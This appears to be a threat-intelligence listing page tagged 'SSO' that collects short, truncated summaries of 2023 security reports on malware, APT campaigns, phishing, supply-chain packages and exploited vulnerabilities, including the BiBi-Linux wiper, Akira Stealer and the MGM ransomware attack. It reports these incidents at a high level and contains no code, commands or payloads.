Security Joes Incident Response identified a new Linux wiper sample linked to Hamas-affiliated hacktivists, named BiBi-Linux Wiper, observed targeting Israeli companies. The malware destroys data by overwriting files, renaming them with a BiBi-containing exten…
Tag: SSO
Cyble CRIL uncovered a new Higaisa APT operation that uses a phishing site impersonating legitimate VPN software to deliver a Rust-based payload. The malware features anti-debugging, shellcode decryption, and encrypted C2 communication, with connections to add…
Insikt Group identified an application disseminated on a Telegram Channel used by members or supporters of the Hamas terrorist organization
Two campaigns targeted at Hong Kong residents used malvertising to push fake WhatsApp Web and Telegram pages, tricking victims into scanning QR codes or downloading malware. The operators aimed to steal data, impersonate accounts, and compromise devices, with …
Akira Stealer is a Python-based information stealer offered as Malware-as-a-Service (MaaS) via a dedicated portal at Akira.red, with Telegram used for updates and command-and-control. It harvests credentials, financial data, and system information, exfiltratin…
Kimsuky, a North Korea–sponsored threat group, leverages spearphishing and a suite of backdoors, infostealers, and remote-control tools to gain access and exfiltrate data from targets. The operation prominently relies on RDP and related tools (including RDP wr…
Symantec Threat Hunter Team attributes a new APT group, Grayling, to a campaign targeting multiple organizations in Taiwan’s manufacturing, IT, and biomedical sectors, with additional victims in the Pacific Islands government, Vietnam, and the U.S. The operati…
Two QR-code-based phishing campaigns are analyzed, showing attackers bypass email security by using images of text and QR codes in emails and attachments instead of readable URLs. The campaigns employ layered evasion (redirection, anti-bot checks, CAPTCHA evas…
The advisory describes active exploitation of CVE-2023-22515 in Atlassian Confluence Data Center and Server, enabling threat actors to create unauthorized Confluence administrator accounts and gain initial access. It also covers post-exploitation data exfiltra…
Phylum detected a typosquatted NuGet package that delivered the SeroXen RAT, demonstrating how open-source ecosystems can be abused. The post details the typosquatted package, its obfuscated payload chain (PowerShell, batch scripts, DLLs), and download-count a…
A spike in phishing scams targets USPS customers with SMS messages that spoof the postal service and direct users to deceptive domains to harvest personal and financial data, as well as targeting other national postal services. The operation uses USPS-branded …
ReversingLabs discovered a typosquatting npm package, node-hide-console-windows, that downloaded a DiscordRAT 2.0 executable which can deploy the r77 fileless ring‑3 rootkit to hide processes and paths. The malicious package also fetched a PyInstaller‑compiled…
X-Force uncovered a global NetScaler Gateway credential harvesting campaign that exploits CVE-2023-3519 to inject a credential-harvesting script into authentication pages. Attackers used attacker-controlled domains, web shells, and NSPPE crash artifacts to ena…
More than a week after it suffered a crippling ransomware attack, the hotel giant MGM is struggling to recover. The attack, linked to the ransomware-as-a-service (RaaS) group known as ALPHV, or BlackCat, caused slot machines and ATMs in MGM’s Las Vegas hotels to go dark and forced hotel staff to rev…
Talos reports that Qakbot-affiliated actors have been distributing Ransom Knight ransomware and the Remcos backdoor via phishing emails since early August 2023, continuing despite the FBI’s late August 2023 infrastructure seizure. The operation suggests the de…